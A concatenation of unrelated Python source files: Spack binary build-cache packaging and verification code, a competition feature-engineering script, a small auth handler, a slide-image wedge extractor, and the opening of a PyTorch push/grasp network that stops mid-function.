str(spec.compiler).replace("@", "-"),
spec.name,
spec.version,
spec.dag_hash(),
ext)
def tarball_path_name(spec, ext):
"""
Return the full path+name for a given spec according to the convention
<tarball_directory_name>/<tarball_name>
"""
return os.path.join(tarball_directory_name(spec),
tarball_name(spec, ext))
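# Worked (hypothetical) example of the three naming helpers above, for a spec
# with architecture linux-ubuntu18.04-x86_64, compiler gcc@7.3.0, package
# zlib@1.2.11 and dag hash abc123:
#
#   tarball_directory_name(spec)
#       -> linux-ubuntu18.04-x86_64/gcc-7.3.0/zlib-1.2.11
#   tarball_name(spec, '.spack')
#       -> linux-ubuntu18.04-x86_64-gcc-7.3.0-zlib-1.2.11-abc123.spack
#   tarball_path_name(spec, '.spack')
#       -> linux-ubuntu18.04-x86_64/gcc-7.3.0/zlib-1.2.11/
#          linux-ubuntu18.04-x86_64-gcc-7.3.0-zlib-1.2.11-abc123.spack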
def checksum_tarball(file):
# calculate sha256 hash of tar file
block_size = 65536
hasher = hashlib.sha256()
with open(file, 'rb') as tfile:
buf = tfile.read(block_size)
while len(buf) > 0:
hasher.update(buf)
buf = tfile.read(block_size)
return hasher.hexdigest()
def sign_tarball(key, force, specfile_path):
# Sign the packages if keys available
if not has_gnupg2():
raise NoGpgException(
"gpg2 is not available in $PATH .\n"
"Use spack install gnupg and spack load gnupg.")
else:
if key is None:
keys = Gpg.signing_keys()
if len(keys) == 1:
key = keys[0]
if len(keys) > 1:
raise PickKeyException(str(keys))
if len(keys) == 0:
msg = "No default key available for signing.\n"
msg += "Use spack gpg init and spack gpg create"
msg += " to create a default key."
raise NoKeyException(msg)
if os.path.exists('%s.asc' % specfile_path):
if force:
os.remove('%s.asc' % specfile_path)
else:
raise NoOverwriteException('%s.asc' % specfile_path)
Gpg.sign(key, specfile_path, '%s.asc' % specfile_path)
def generate_index(outdir, indexfile_path):
f = open(indexfile_path, 'w')
header = """<html>\n
<head>\n</head>\n
<list>\n"""
footer = "</list>\n</html>\n"
paths = os.listdir(outdir + '/build_cache')
f.write(header)
for path in paths:
rel = os.path.basename(path)
f.write('<li><a href="%s"> %s</a>\n' % (rel, rel))
f.write(footer)
f.close()
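# The generated index is intentionally minimal; for a cache holding a single
# .spack archive and its .spec.yaml, the file written above looks roughly like
# this (entry names are placeholders, and the header/footer come verbatim from
# the strings in generate_index):
#
#   <html>
#   <head></head>
#   <list>
#   <li><a href="zlib-1.2.11-abc123.spack"> zlib-1.2.11-abc123.spack</a>
#   <li><a href="zlib-1.2.11-abc123.spec.yaml"> zlib-1.2.11-abc123.spec.yaml</a>
#   </list>
#   </html>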
def build_tarball(spec, outdir, force=False, rel=False, unsigned=False,
allow_root=False, key=None):
"""
Build a tarball from given spec and put it into the directory structure
used at the mirror (following <tarball_directory_name>).
"""
# set up some paths
tarfile_name = tarball_name(spec, '.tar.gz')
tarfile_dir = os.path.join(outdir, "build_cache",
tarball_directory_name(spec))
tarfile_path = os.path.join(tarfile_dir, tarfile_name)
mkdirp(tarfile_dir)
spackfile_path = os.path.join(
outdir, "build_cache", tarball_path_name(spec, '.spack'))
if os.path.exists(spackfile_path):
if force:
os.remove(spackfile_path)
else:
raise NoOverwriteException(str(spackfile_path))
# need to copy the spec file so the build cache can be downloaded
# without concretizing with the current spack packages
# and preferences
spec_file = os.path.join(spec.prefix, ".spack", "spec.yaml")
specfile_name = tarball_name(spec, '.spec.yaml')
specfile_path = os.path.realpath(
os.path.join(outdir, "build_cache", specfile_name))
indexfile_path = os.path.join(outdir, "build_cache", "index.html")
if os.path.exists(specfile_path):
if force:
os.remove(specfile_path)
else:
raise NoOverwriteException(str(specfile_path))
# make a copy of the install directory to work with
workdir = os.path.join(tempfile.mkdtemp(), os.path.basename(spec.prefix))
install_tree(spec.prefix, workdir, symlinks=True)
# create info for later relocation and create tar
write_buildinfo_file(spec.prefix, workdir, rel=rel)
    # optionally make the paths in the binaries relative to each other
# in the spack install tree before creating tarball
if rel:
try:
make_package_relative(workdir, spec.prefix, allow_root)
except Exception as e:
shutil.rmtree(workdir)
shutil.rmtree(tarfile_dir)
tty.die(str(e))
else:
try:
make_package_placeholder(workdir, allow_root)
except Exception as e:
shutil.rmtree(workdir)
shutil.rmtree(tarfile_dir)
tty.die(str(e))
# create compressed tarball of the install prefix
with closing(tarfile.open(tarfile_path, 'w:gz')) as tar:
tar.add(name='%s' % workdir,
arcname='%s' % os.path.basename(spec.prefix))
# remove copy of install directory
shutil.rmtree(workdir)
# get the sha256 checksum of the tarball
checksum = checksum_tarball(tarfile_path)
# add sha256 checksum to spec.yaml
spec_dict = {}
with open(spec_file, 'r') as inputfile:
content = inputfile.read()
spec_dict = yaml.load(content)
bchecksum = {}
bchecksum['hash_algorithm'] = 'sha256'
bchecksum['hash'] = checksum
spec_dict['binary_cache_checksum'] = bchecksum
# Add original install prefix relative to layout root to spec.yaml.
    # This will be used to determine if the directory layout has changed.
buildinfo = {}
buildinfo['relative_prefix'] = os.path.relpath(
spec.prefix, spack.store.layout.root)
spec_dict['buildinfo'] = buildinfo
with open(specfile_path, 'w') as outfile:
outfile.write(yaml.dump(spec_dict))
# sign the tarball and spec file with gpg
if not unsigned:
sign_tarball(key, force, specfile_path)
# put tarball, spec and signature files in .spack archive
with closing(tarfile.open(spackfile_path, 'w')) as tar:
tar.add(name='%s' % tarfile_path, arcname='%s' % tarfile_name)
tar.add(name='%s' % specfile_path, arcname='%s' % specfile_name)
if not unsigned:
tar.add(name='%s.asc' % specfile_path,
arcname='%s.asc' % specfile_name)
# cleanup file moved to archive
os.remove(tarfile_path)
if not unsigned:
os.remove('%s.asc' % specfile_path)
# create an index.html for the build_cache directory so specs can be found
if os.path.exists(indexfile_path):
os.remove(indexfile_path)
generate_index(outdir, indexfile_path)
return None
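# Hedged usage sketch (the mirror path and flags are illustrative, not taken from
# the original code): build an unsigned, non-relative binary package for an
# installed spec and publish it into a local mirror directory:
#   build_tarball(spec, '/path/to/mirror', force=True, unsigned=True)
# With unsigned=False a usable GPG key must be available (see sign_tarball above).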
def download_tarball(spec):
"""
Download binary tarball for given package into stage area
    Return the path to the downloaded tarball if successful, otherwise None
"""
mirrors = spack.config.get('mirrors')
if len(mirrors) == 0:
tty.die("Please add a spack mirror to allow " +
"download of pre-compiled packages.")
tarball = tarball_path_name(spec, '.spack')
for key in mirrors:
url = mirrors[key] + "/build_cache/" + tarball
# stage the tarball into standard place
stage = Stage(url, name="build_cache", keep=True)
try:
stage.fetch()
return stage.save_filename
except fs.FetchError:
continue
return None
def make_package_relative(workdir, prefix, allow_root):
"""
Change paths in binaries to relative paths
"""
buildinfo = read_buildinfo_file(workdir)
old_path = buildinfo['buildpath']
orig_path_names = list()
cur_path_names = list()
for filename in buildinfo['relocate_binaries']:
orig_path_names.append(os.path.join(prefix, filename))
cur_path_names.append(os.path.join(workdir, filename))
relocate.make_binary_relative(cur_path_names, orig_path_names,
old_path, allow_root)
def make_package_placeholder(workdir, allow_root):
"""
Change paths in binaries to placeholder paths
"""
buildinfo = read_buildinfo_file(workdir)
cur_path_names = list()
for filename in buildinfo['relocate_binaries']:
cur_path_names.append(os.path.join(workdir, filename))
relocate.make_binary_placeholder(cur_path_names, allow_root)
def relocate_package(workdir, allow_root):
"""
Relocate the given package
"""
buildinfo = read_buildinfo_file(workdir)
new_path = spack.store.layout.root
old_path = buildinfo['buildpath']
rel = buildinfo.get('relative_rpaths', False)
if rel:
return
tty.msg("Relocating package from",
"%s to %s." % (old_path, new_path))
path_names = set()
for filename in buildinfo['relocate_textfiles']:
path_name = os.path.join(workdir, filename)
# Don't add backup files generated by filter_file during install step.
if not path_name.endswith('~'):
path_names.add(path_name)
relocate.relocate_text(path_names, old_path, new_path)
# If the binary files in the package were not edited to use
# relative RPATHs, then the RPATHs need to be relocated
if not rel:
path_names = set()
for filename in buildinfo['relocate_binaries']:
path_name = os.path.join(workdir, filename)
path_names.add(path_name)
relocate.relocate_binary(path_names, old_path, new_path,
allow_root)
def extract_tarball(spec, filename, allow_root=False, unsigned=False,
force=False):
"""
extract binary tarball for given package into install area
"""
if os.path.exists(spec.prefix):
if force:
shutil.rmtree(spec.prefix)
else:
raise NoOverwriteException(str(spec.prefix))
tmpdir = tempfile.mkdtemp()
stagepath = os.path.dirname(filename)
spackfile_name = tarball_name(spec, '.spack')
spackfile_path = os.path.join(stagepath, spackfile_name)
tarfile_name = tarball_name(spec, '.tar.gz')
tarfile_path = os.path.join(tmpdir, tarfile_name)
specfile_name = tarball_name(spec, '.spec.yaml')
specfile_path = os.path.join(tmpdir, specfile_name)
with closing(tarfile.open(spackfile_path, 'r')) as tar:
tar.extractall(tmpdir)
if not unsigned:
if os.path.exists('%s.asc' % specfile_path):
try:
Gpg.verify('%s.asc' % specfile_path, specfile_path)
except Exception as e:
shutil.rmtree(tmpdir)
tty.die(str(e))
else:
shutil.rmtree(tmpdir)
raise NoVerifyException(
"Package spec file failed signature verification.\n"
"Use spack buildcache keys to download "
"and install a key for verification from the mirror.")
# get the sha256 checksum of the tarball
checksum = checksum_tarball(tarfile_path)
# get the sha256 checksum recorded at creation
spec_dict = {}
with open(specfile_path, 'r') as inputfile:
content = inputfile.read()
spec_dict = yaml.load(content)
bchecksum = spec_dict['binary_cache_checksum']
# if the checksums don't match don't install
if bchecksum['hash'] != checksum:
shutil.rmtree(tmpdir)
raise NoChecksumException(
"Package tarball failed checksum verification.\n"
"It cannot be installed.")
new_relative_prefix = str(os.path.relpath(spec.prefix,
spack.store.layout.root))
# if the original relative prefix is in the spec file use it
buildinfo = spec_dict.get('buildinfo', {})
old_relative_prefix = buildinfo.get('relative_prefix', new_relative_prefix)
# if the original relative prefix and new relative prefix differ the
# directory layout has changed and the buildcache cannot be installed
if old_relative_prefix != new_relative_prefix:
shutil.rmtree(tmpdir)
msg = "Package tarball was created from an install "
msg += "prefix with a different directory layout.\n"
msg += "It cannot be relocated."
raise NewLayoutException(msg)
# extract the tarball in a temp directory
with closing(tarfile.open(tarfile_path, 'r')) as tar:
tar.extractall(path=tmpdir)
# the base of the install prefix is used when creating the tarball
# so the pathname should be the same now that the directory layout
# is confirmed
workdir = os.path.join(tmpdir, os.path.basename(spec.prefix))
# cleanup
os.remove(tarfile_path)
os.remove(specfile_path)
try:
relocate_package(workdir, allow_root)
except Exception as e:
shutil.rmtree(workdir)
tty.die(str(e))
# Delay creating spec.prefix until verification is complete
# and any relocation has been done.
else:
install_tree(workdir, spec.prefix, symlinks=True)
finally:
shutil.rmtree(tmpdir)
#: Internal cache for get_specs
_cached_specs = None
def get_specs(force=False):
"""
Get spec.yaml's for build caches available on mirror
"""
global _cached_specs
if _cached_specs:
tty.debug("Using previously-retrieved specs")
return _cached_specs
mirrors = spack.config.get('mirrors')
if len(mirrors) == 0:
tty.warn("No Spack mirrors are currently configured")
return {}
path = str(spack.architecture.sys_type())
urls = set()
for key in mirrors:
url = mirrors[key]
if url.startswith('file'):
mirror = url.replace('file://', '') + '/build_cache'
tty.msg("Finding buildcaches in %s" % mirror)
files = os.listdir(mirror)
for file in files:
if re.search('spec.yaml', file):
link = 'file://' + mirror + '/' + file
urls.add(link)
else:
tty.msg("Finding buildcaches on %s" % url)
p, links = spider(url + "/build_cache")
for link in links:
if re.search("spec.yaml", link) and re.search(path, link):
urls.add(link)
_cached_specs = set()
for link in urls:
with Stage(link, name="build_cache", keep=True) as stage:
if force and os.path.exists(stage.save_filename):
os.remove(stage.save_filename)
if not os.path.exists(stage.save_filename):
try:
stage.fetch()
except fs.FetchError:
continue
with open(stage.save_filename, 'r') as f:
# read the spec from the build cache file. All specs
# in build caches are concrete (as they are built) so
# we need to mark this spec concrete on read-in.
spec = spack.spec.Spec.from_yaml(f)
spec._mark_concrete()
_cached_specs.add(spec)
return _cached_specs
def get_keys(install=False, trust=False, force=False):
"""
Get pgp public keys available on mirror
"""
mirrors = spack.config.get('mirrors')
if len(mirrors) == 0:
tty.die("Please add a spack mirror to allow " +
"download of build caches.")
keys = set()
for key in mirrors:
url = mirrors[key]
if url.startswith('file'):
mirror = url.replace('file://', '') + '/build_cache'
tty.msg("Finding public keys in %s" % mirror)
files = os.listdir(mirror)
for file in files:
                if re.search(r'\.key', file):
link = 'file://' + mirror + '/' + file
keys.add(link)
else:
tty.msg("Finding public keys on %s" % url)
p, links = spider(url + "/build_cache", depth=1)
for link in links:
if re.search("\.key", link):
keys.add(link)
for link in keys:
with Stage(link, name="build_cache", keep=True) as stage:
if os.path.exists(stage.save_filename) and force:
os.remove(stage.save_filename)
if not os.path.exists(stage.save_filename):
try:
stage.fetch()
except fs.FetchError:
continue
tty.msg('Found key %s' % link)
if install:
if trust:
Gpg.trust(stage.save_filename)
tty.msg('Added this key to trusted keys.')
else:
tty.msg('Will not add this key to trusted keys.'
'Use -t to install all downloaded keys')
|
py | 7df802052945cfb0d080bfa80cbf0b75ef837feb | #!/home/sunnymarkliu/softwares/anaconda3/bin/python
# _*_ coding: utf-8 _*_
"""
@author: SunnyMarkLiu
@time : 17-12-22 5:30 PM
"""
from __future__ import absolute_import, division, print_function
import os
import sys
try:
    import cPickle
except ImportError:
    import pickle as cPickle  # cPickle is Python 2 only; fall back to pickle on Python 3
module_path = os.path.abspath(os.path.join('..'))
sys.path.append(module_path)
# remove warnings
import warnings
warnings.filterwarnings('ignore')
import numpy as np
import pandas as pd
from conf.configure import Configure
from utils import data_utils
def discretize_features(train, test):
""" 连续特征离散化 """
test['orderType'] = np.array([0] * test.shape[0])
conbined_data = pd.concat([train, test])
# basic_user_action_features
numerical_features = ['browse_product_ratio', 'browse_product2_ratio', 'browse_product3_ratio', 'fillin_form5_ratio', 'fillin_form6_ratio',
'fillin_form7_ratio', 'open_app_ratio', 'pay_money_ratio', 'submit_order_ratio', 'open_app_pay_money_ratio',
'browse_product_pay_money_ratio', 'browse_product2_pay_money_ratio', 'browse_product3_pay_money_ratio',
'fillin_form5_pay_money_ratio', 'fillin_form6_pay_money_ratio', 'fillin_form7_pay_money_ratio','submit_order_pay_money_ratio']
for feature in numerical_features:
conbined_data[feature] = pd.cut(conbined_data[feature].values, bins=int(len(set(conbined_data[feature])) * 0.6)).codes
train = conbined_data.iloc[:train.shape[0], :]
test = conbined_data.iloc[train.shape[0]:, :]
del test['orderType']
return train, test
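# Small standalone illustration of the binning used above (made-up values; pandas
# behaviour sketch only):
#   import pandas as pd
#   s = pd.Series([0.1, 0.2, 0.2, 0.9, 1.5])
#   codes = pd.cut(s.values, bins=int(len(set(s)) * 0.6)).codes
#   # codes is an integer array such as [0, 0, 0, 1, 1]; each ratio is replaced by
#   # its bin index, which is what discretize_features writes back into the frame.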
def feature_interaction(train, test):
""" 特征交叉等操作 """
test['orderType'] = np.array([0] * test.shape[0])
conbined_data = pd.concat([train, test])
    print('One-hot encoding some categorical features')
# basic_user_info, bad!
# dummies = pd.get_dummies(conbined_data['province_code'], prefix='province_code')
# conbined_data[dummies.columns] = dummies
# del conbined_data['province_code']
# # basic_user_action_features, bad!
# dummies = pd.get_dummies(conbined_data['most_free_month'], prefix='most_free_month')
# conbined_data[dummies.columns] = dummies
# del conbined_data['most_free_month']
# user_order_history_features,improve cv a little
# dum_features = ['last_time_continent', 'last_time_country', 'last_time_city']
# for f in dum_features:
# dummies = pd.get_dummies(conbined_data[f], prefix=f)
# conbined_data[dummies.columns] = dummies
# del conbined_data[f]
    print('Feature combinations')
# conbined_data['has_good_order_x_country_rich'] = conbined_data['has_good_order'] * conbined_data['country_rich']
train = conbined_data.iloc[:train.shape[0], :]
test = conbined_data.iloc[train.shape[0]:, :]
del test['orderType']
return train, test
def load_train_test():
    # Orders to be predicted (original training and test sets)
train = pd.read_csv(Configure.base_path + 'train/orderFuture_train.csv', encoding='utf8')
test = pd.read_csv(Configure.base_path + 'test/orderFuture_test.csv', encoding='utf8')
    # Load the features and merge them in
features_merged_dict = Configure.features
for feature_name in Configure.features:
print('pd merge', feature_name)
train_feature, test_feature = data_utils.load_features(feature_name)
train = pd.merge(train, train_feature,
on=features_merged_dict[feature_name]['on'],
how=features_merged_dict[feature_name]['how'])
test = pd.merge(test, test_feature,
on=features_merged_dict[feature_name]['on'],
how=features_merged_dict[feature_name]['how'])
    # # Oversample to handle class imbalance
# pos_train = train[train['orderType'] == 1]
# neg_train = train[train['orderType'] == 0]
# print('train, ordertype1: ', pos_train.shape[0], ', ordertype0: ', neg_train.shape[0], ', 1:0 = ', 1.0 * pos_train.shape[0] / neg_train.shape[0])
#
# sample_pos_size = int(pos_train.shape[0] * 0.05)
# sample_pos_train = pos_train.sample(sample_pos_size, random_state=42)
# train = pd.concat([neg_train, pos_train, sample_pos_train])
# pos_train = train[train['orderType'] == 1]
# print('train, ordertype1: ', pos_train.shape[0], ', ordertype0: ', neg_train.shape[0], ', 1:0 = ', 1.0 * pos_train.shape[0] / neg_train.shape[0])
train.drop(['gender', 'province', 'age', 'has_history_flag'], axis=1, inplace=True)
test.drop(['gender', 'province', 'age', 'has_history_flag'], axis=1, inplace=True)
    # # Drop features with very low importance
# droped_features = ['user_rating_std']
# train.drop(droped_features, axis=1, inplace=True)
# test.drop(droped_features, axis=1, inplace=True)
    print('Feature combinations')
    train, test = feature_interaction(train, test)
    print('Discretizing continuous features')
train, test = discretize_features(train, test)
return train, test
def load_571_all_feature_datasets():
with open('all_571_features_train.pkl', "rb") as f:
train = cPickle.load(f)
with open('all_571_features_test.pkl', "rb") as f:
test = cPickle.load(f)
return train, test
def load_0_97210_datasets():
with open('train_0.97210.pkl', "rb") as f:
train = cPickle.load(f)
with open('test_0.97210.pkl', "rb") as f:
test = cPickle.load(f)
return train, test
def load_datasets():
print('load baseline features')
train, test = load_0_97210_datasets()
    # These features are collinear with the better-performing history_order_type_sum_lg0
# train.drop(['2016_2017_first_last_ordertype'], axis=1, inplace=True)
# test.drop(['2016_2017_first_last_ordertype'], axis=1, inplace=True)
    # Load the features and merge them in
features_merged_dict = Configure.new_features
for feature_name in features_merged_dict:
print('merge', feature_name)
train_feature, test_feature = data_utils.load_features(feature_name)
train = pd.merge(train, train_feature,
on=features_merged_dict[feature_name]['on'],
how=features_merged_dict[feature_name]['how'])
test = pd.merge(test, test_feature,
on=features_merged_dict[feature_name]['on'],
how=features_merged_dict[feature_name]['how'])
    # # Following the rule, add test samples of class 1 to the training set; it blew up online!
# sample_pos_test = test[test['history_order_type_sum_lg0'] == 1]
# sample_pos_test['orderType'] = 1
# train = pd.concat([train, sample_pos_test], axis=0)
train.drop(['history_order_type_sum_lg0'], axis=1, inplace=True)
test.drop(['history_order_type_sum_lg0'], axis=1, inplace=True)
# train, test = remove_some_features(train, test)
# with open('train_0.97329.pkl', "wb") as f:
# cPickle.dump(train, f, -1)
# with open('test_0.97329.pkl', "wb") as f:
# cPickle.dump(test, f, -1)
#
return train, test
def remove_some_features(train, test):
features_weights = pd.read_csv('0.97329_xgb_features_weights.csv')
removed_features = features_weights[features_weights['weights'] == 0]['feature'].values
train.drop(removed_features, axis=1, inplace=True)
test.drop(removed_features, axis=1, inplace=True)
return train, test
|
py | 7df802e23d90f465f24496f7bb78fa7fd9bdcfae | from bnw.handlers.base import require_auth
@require_auth
def cmd_whoami(request):
return dict(ok=True, user=request.user['name'])
|
py | 7df80347e82cb0a9bdadced4098a7c5ca1c3e436 | import json
import logging
from functools import reduce
from os.path import join
from typing import Tuple, Iterator, List, Dict, Any
import numpy
import openslide
import pandas
from pandas import DataFrame
from antilles.block import Field, Step, Block
from antilles.pipeline.annotate import annotate_slides
from antilles.project import Project
from antilles.utils.image import get_mpp_from_openslide
from antilles.utils.io import DAO
from antilles.utils.math import pol2cart
def calc_bbox(
dims: Tuple[int, int], center: Tuple[int, int], angle: float, **kwargs
) -> Tuple[Tuple[int, int], Tuple[int, int]]:
width, height = dims
c_x, c_y = center
span = kwargs.get("span", 90.0)
radius_inner = kwargs.get("radius_inner", 400)
radius_outer = kwargs.get("radius_outer", 800)
n_divisions = 200
n_div0 = int(n_divisions * float(span) / 360.0)
n_div1 = n_divisions - n_div0
hspan = span / 2.0
angles0 = numpy.linspace(angle - hspan, angle + hspan, n_div0)
angles1 = numpy.linspace(angle + hspan, angle + 360 - hspan, n_div1)
min_dx, max_dx = None, None
min_dy, max_dy = None, None
for r, angles in zip([radius_outer, radius_inner], [angles0, angles1]):
for a in angles:
dx, dy = pol2cart(r, a)
if min_dx is None:
min_dx = dx
if max_dx is None:
max_dx = dx
if min_dy is None:
min_dy = dy
if max_dy is None:
max_dy = dy
min_dx, max_dx = min(min_dx, dx), max(max_dx, dx)
min_dy, max_dy = min(min_dy, dy), max(max_dy, dy)
min_x = int(max(c_x + min_dx, 0))
max_x = int(min(c_x + max_dx, width))
dx = max_x - min_x
min_y = int(max(c_y + min_dy, 0))
max_y = int(min(c_y + max_dy, height))
dy = max_y - min_y
return (min_x, min_y), (dx, dy)
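# Hedged example of calling calc_bbox (all numbers are invented for illustration):
#   origin, size = calc_bbox(
#       dims=(20000, 20000),      # full slide width/height in pixels
#       center=(10000, 10000),    # wedge apex
#       angle=45.0,               # wedge direction in degrees
#       span=90.0, radius_inner=400, radius_outer=800)
#   # origin is the top-left corner of the wedge's bounding box and size its
#   # (width, height), both clamped to the slide dimensions.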
def get_extraction_sequence(settings: Dict[str, Any]) -> Iterator[Dict[str, Any]]:
for key in ["samples", "devices", "coords", "angles"]:
if key not in settings.keys():
raise ValueError(f"Key not found: {key}")
regions = settings["coords"].to_dict("records")
sample_angles = settings["angles"].to_dict("records")
sample_angles = {s["sample"]: float(s["angle"]) for s in sample_angles}
for region in regions:
# get wells from payload
device_name = next(
s["device"] for s in settings["samples"] if s["name"] == region["sample"]
)
payload = next(
d["payload"] for d in settings["devices"] if d["name"] == device_name
)
wells = next(l["wells"] for l in payload if l["level"] == region["level"])
src = region["relpath"]
for well in wells:
fields = {
"project": region["project"],
"block": region["block"],
"panel": region["panel"],
"level": region["level"],
"sample": region["sample"],
"cohorts": region["cohorts"],
"drug": well["drug"],
}
params = {
"center": (int(region["center_x"]), int(region["center_y"])),
"angle": sample_angles[region["sample"]] + well["angle"],
}
yield {"src": src, "fields": fields, "params": params}
def microns2pixels(dct: Dict[str, Any], keys: List[str], mpp: float):
for key in keys:
try:
dct[key] /= mpp
except TypeError:
pass
return dct
def get_filepath(step: Step, fields: Dict[str, Any], output_order: List[str]) -> str:
for key in ["project", "block", "panel", "level", "sample", "drug"]:
if key not in fields.keys():
raise ValueError(f"Key not found: {key}")
fields["level"] = "LVL" + str(fields["level"])
dirpath = join(fields["project"], fields["block"], step.value)
dirpath = join(dirpath, *(fields[o] for o in output_order))
DAO.make_dir(dirpath)
filename_order = ["project", "block", "panel", "level", "sample", "drug"]
filename = "_".join(fields[f] for f in filename_order) + ".tif"
filepath = join(dirpath, filename)
fields["level"] = int(fields["level"][len("LVL") :])
return filepath
def extract_image(src: str, dst: str, params: Dict[str, Any]) -> Dict[str, Any]:
with openslide.OpenSlide(DAO.abs(src)) as obj:
dims = obj.dimensions
mpp = get_mpp_from_openslide(obj)
params = microns2pixels(params, ["radius_inner", "radius_outer"], mpp)
origin, size = calc_bbox(dims=dims, **params)
image = obj.read_region(origin, 0, size)
image = image.convert("RGB")
image.save(DAO.abs(dst))
cx = params["center"][0] - origin[0]
cy = params["center"][1] - origin[1]
r_init = 400 / mpp
dx, dy = pol2cart(r_init, params["angle"])
wx, wy = int(round(cx + dx)), int(round(cy + dy))
return {"oxy": origin, "cxy": (cx, cy), "wxy": (wx, wy), "dims": size, "mpp": mpp}
def update_translate(df: DataFrame, using: DataFrame):
buffer = 5
cols = ["project", "block", "panel", "level", "sample", "drug"]
for i, row in df.iterrows():
ind = (row[col] == using[col] for col in cols)
ind = reduce((lambda x, y: x & y), ind)
using_row = using[ind]
if len(using_row) == 1:
oxy_old = using_row["origin_x"].values[0], using_row["origin_y"].values[0]
cxy_old = using_row["center_x"].values[0], using_row["center_y"].values[0]
wxy_old = using_row["well_x"].values[0], using_row["well_y"].values[0]
oxy_new = row["origin_x"], row["origin_y"]
diff_x = oxy_new[0] - oxy_old[0]
diff_y = oxy_new[1] - oxy_old[1]
cxy_new = cxy_old[0] - diff_x, cxy_old[1] - diff_y
wxy_new = wxy_old[0] - diff_x, wxy_old[1] - diff_y
cxy_new = max(cxy_new[0], buffer), max(cxy_new[1], buffer)
wxy_new = max(wxy_new[0], buffer), max(wxy_new[1], buffer)
df.loc[i, ["center_x"]] = cxy_new[0]
df.loc[i, ["center_y"]] = cxy_new[1]
df.loc[i, ["well_x"]] = wxy_new[0]
df.loc[i, ["well_y"]] = wxy_new[1]
df.loc[i, ["metadata"]] = using_row["metadata"].values[0]
return df
class Extractor:
def __init__(self, project: Project, block: Block):
self.log = logging.getLogger(__name__)
self.project = project
self.block = block
def adjust(self):
coords = self.block.get(Field.IMAGES_COORDS)
angles = self.block.get(Field.ANGLES_COARSE)
annotate_slides(coords, angles)
self.block.save(coords, Field.IMAGES_COORDS)
self.block.save(angles, Field.ANGLES_COARSE)
def extract(self, params: Dict[str, Any]) -> None:
self.log.info("Extracting wedges ... ")
self.block.clean()
regions_prev = self.block.get(Field.IMAGES_COORDS_BOW)
regions = self.extract_wedges(params["wedge"])
regions = update_translate(regions, using=regions_prev)
self.block.save(regions, Field.IMAGES_COORDS_BOW)
self.log.info("Extracting wedges complete.")
def extract_wedges(self, params: Dict[str, Any]) -> DataFrame:
output_order = self.project.config["output_order"]
settings = {
"samples": self.block.samples,
"devices": self.project.config["devices"],
"coords": self.block.get(Field.IMAGES_COORDS),
"angles": self.block.get(Field.ANGLES_COARSE),
}
regions = []
regions_to_extract = get_extraction_sequence(settings)
for region in regions_to_extract:
src = region["src"]
dst = get_filepath(Step.S1, region["fields"], output_order)
props = extract_image(src, dst, {**params, **region["params"]})
regions.append(
{
**region["fields"],
**{
"relpath": dst,
"origin_x": props["oxy"][0],
"origin_y": props["oxy"][1],
"center_x": props["cxy"][0],
"center_y": props["cxy"][1],
"well_x": props["wxy"][0],
"well_y": props["wxy"][1],
"mpp": props["mpp"],
"width": props["dims"][0],
"height": props["dims"][1],
"metadata": json.dumps({}),
},
}
)
columns = [
"relpath",
"project",
"block",
"panel",
"level",
"sample",
"cohorts",
"drug",
"origin_x",
"origin_y",
"center_x",
"center_y",
"well_x",
"well_y",
"mpp",
"metadata",
]
regions = pandas.DataFrame(regions, columns=columns)
return regions
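# Hedged sketch of driving the extractor (constructing Project and Block is outside
# the scope of this module; the wedge parameter values are invented):
#   extractor = Extractor(project, block)
#   extractor.adjust()                                  # interactive annotation pass
#   extractor.extract({"wedge": {"span": 90.0,
#                                "radius_inner": 400,   # microns, converted via mpp
#                                "radius_outer": 800}})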
|
py | 7df8044d424e943a807e1fc1f0ffbfdd37ff5208 | #!/usr/bin/env python
from collections import OrderedDict
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from networks import FeatureTunk
class reinforcement_net(nn.Module):
def __init__(self, use_cuda):
super(reinforcement_net, self).__init__()
self.use_cuda = use_cuda
# Initialize network trunks with DenseNet pre-trained on ImageNet
self.feature_tunk = FeatureTunk()
self.num_rotations = 16
# Construct network branches for pushing and grasping
self.pushnet = nn.Sequential(OrderedDict([
('push-norm0', nn.BatchNorm2d(1024)),
('push-relu0', nn.ReLU(inplace=True)),
('push-conv0', nn.Conv2d(1024, 128, kernel_size=3, stride=1, padding=1, bias=False)),
('push-norm1', nn.BatchNorm2d(128)),
('push-relu1', nn.ReLU(inplace=True)),
('push-conv1', nn.Conv2d(128, 32, kernel_size=1, stride=1, bias=False)),
('push-norm2', nn.BatchNorm2d(32)),
('push-relu2', nn.ReLU(inplace=True)),
('push-conv2', nn.Conv2d(32, 1, kernel_size=1, stride=1, bias=False))
]))
self.graspnet = nn.Sequential(OrderedDict([
('grasp-norm0', nn.BatchNorm2d(1024)),
('grasp-relu0', nn.ReLU(inplace=True)),
('grasp-conv0', nn.Conv2d(1024, 128, kernel_size=3, stride=1, padding=1, bias=False)),
('grasp-norm1', nn.BatchNorm2d(128)),
('grasp-relu1', nn.ReLU(inplace=True)),
('grasp-conv1', nn.Conv2d(128, 32, kernel_size=1, stride=1, bias=False)),
('grasp-norm2', nn.BatchNorm2d(32)),
('grasp-relu2', nn.ReLU(inplace=True)),
('grasp-conv2', nn.Conv2d(32, 1, kernel_size=1, stride=1, bias=False))
]))
# Initialize network weights
for m in self.named_modules():
if 'push-' in m[0] or 'grasp-' in m[0]:
if isinstance(m[1], nn.Conv2d):
nn.init.kaiming_normal_(m[1].weight.data)
elif isinstance(m[1], nn.BatchNorm2d):
m[1].weight.data.fill_(1)
m[1].bias.data.zero_()
# Initialize output variable (for backprop)
self.interm_feat = []
self.output_prob = []
def forward(self, input_color_data, input_depth_data, input_mask_data, is_volatile=False, specific_rotation=-1):
if is_volatile:
with torch.no_grad():
output_prob = []
# Apply rotations to images
for rotate_idx in range(self.num_rotations):
rotate_theta = np.radians(rotate_idx*(360/self.num_rotations))
# NOTES: affine_grid + grid_sample -> spatial transformer networks
# Compute sample grid for rotation BEFORE neural network
affine_mat_before = np.asarray([[np.cos(-rotate_theta), np.sin(-rotate_theta), 0],[-np.sin(-rotate_theta), np.cos(-rotate_theta), 0]])
affine_mat_before.shape = (2, 3, 1)
affine_mat_before = torch.from_numpy(affine_mat_before).permute(2,0,1).float()
if self.use_cuda:
flow_grid_before = F.affine_grid(Variable(affine_mat_before, requires_grad=False).cuda(), input_color_data.size())
else:
flow_grid_before = F.affine_grid(Variable(affine_mat_before, requires_grad=False), input_color_data.size())
# Rotate images clockwise
if self.use_cuda:
rotate_color = F.grid_sample(Variable(input_color_data).cuda(), flow_grid_before)
rotate_depth = F.grid_sample(Variable(input_depth_data).cuda(), flow_grid_before)
